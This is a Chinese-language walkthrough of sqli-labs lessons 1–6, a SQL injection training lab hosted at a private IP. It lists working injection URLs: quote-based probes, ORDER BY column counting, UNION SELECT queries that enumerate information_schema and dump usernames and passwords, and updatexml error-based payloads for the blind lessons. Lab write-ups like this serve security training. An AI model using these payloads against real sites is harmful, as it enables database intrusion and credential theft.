Sqlilabs lesson1-6

注入步驟
判斷注入點
使用且或非來判斷，即and、or、xor
一般使用and來進行判斷，以第一關爲例：
http://172.16.54.161/sqli/Less-1/?id=1’ and ‘1’=‘1 返回正確
http://172.16.54.161/sqli/Less-1/?id=1’ and ‘1’=‘2 返回錯誤
判斷存在注入點
判斷字段數
order by 函數進行判斷
http://172.16.54.161/sqli/Less-1/?id=1’ order by 4 --+ 返回錯誤
http://172.16.54.161/sqli/Less-1/?id=1’ order by 3 --+ 返回正確
即可判斷字段數爲3
查詢數據庫名
users() 獲取用戶名 判斷是否爲root用戶
version() 獲取數據庫版本號 判斷版本是否爲5.0以上
database() 獲取數據庫名
@@version_compile_os 獲取數據庫操作系統

聯合查詢數據庫用戶名、版本號、數據庫名、數據庫操作系統
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,2,3 --+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,user(),3 --+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,version(),3 --+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,database(),3 --+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,@@version_compile_os,3 --+

查詢表名
group_concat() 用於將每組結果用字符串連接起來
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,table_name,3 from information_schema.tables where table_schema=‘security’–+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’–+

查詢列名
如果直接查詢會查詢所有數據庫內的列名，可規定它的數據庫名
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’–+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ and table_schema=‘security’–+

查詢字段名
可用limit或group_concat()來獲取各個字段名
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,username,password from users–+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,username,password from users limit 1,1–+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,username,password from users limit 2,1–+
http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,group_concat(username,0x7e,password),3 from users–+

有回顯值
Lesson 1：http://172.16.54.161/sqli/Less-1/?id=-1’ union select 1,group_concat(username),group_concat(password) from users–+

Lesson 2：http://172.16.54.161/sqli/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users–+

Lesson 3：http://172.16.54.161/sqli/Less-3/?id=-1’) union select 1,group_concat(username),group_concat(password) from users–+

Lesson 4：http://172.16.54.161/sqli/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users–+

以上四種主要就是符號上的區別，在網頁上無法得到有效信息時，也可以查看PHP源碼裏的SQL語句或直接查看頁面源代碼
無回顯值

Lesson 5:
判斷注入點 http://172.16.54.161/sqli/Less-5/?id=1’ and ‘1’=‘1 返回正確
http://172.16.54.161/sqli/Less-5/?id=1’ and ‘1’=‘2 返回錯誤
判斷字段數 http://172.16.54.161/sqli/Less-5/?id=1’ order by 4–+ 返回錯誤
http://172.16.54.161/sqli/Less-5/?id=1’ order by 3–+ 返回正確
查詢數據庫名 可以發現使用原來的union查詢注入沒有在界面中返回值,便使用報錯注入
http://172.16.54.161/sqli/Less-5/?id=-1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

查詢表名 http://172.16.54.161/sqli/Less-5/?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)–+

查詢列名 http://172.16.54.161/sqli/Less-5/?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’),0x7e),1)–+

查詢字段名 http://172.16.54.161/sqli/Less-5/?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1)–+

lesson 6：http://172.16.54.161/sqli/Less-6/?id=-1" and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1)–+

注意不要忘了concat函數，5與6也只是符號上的區別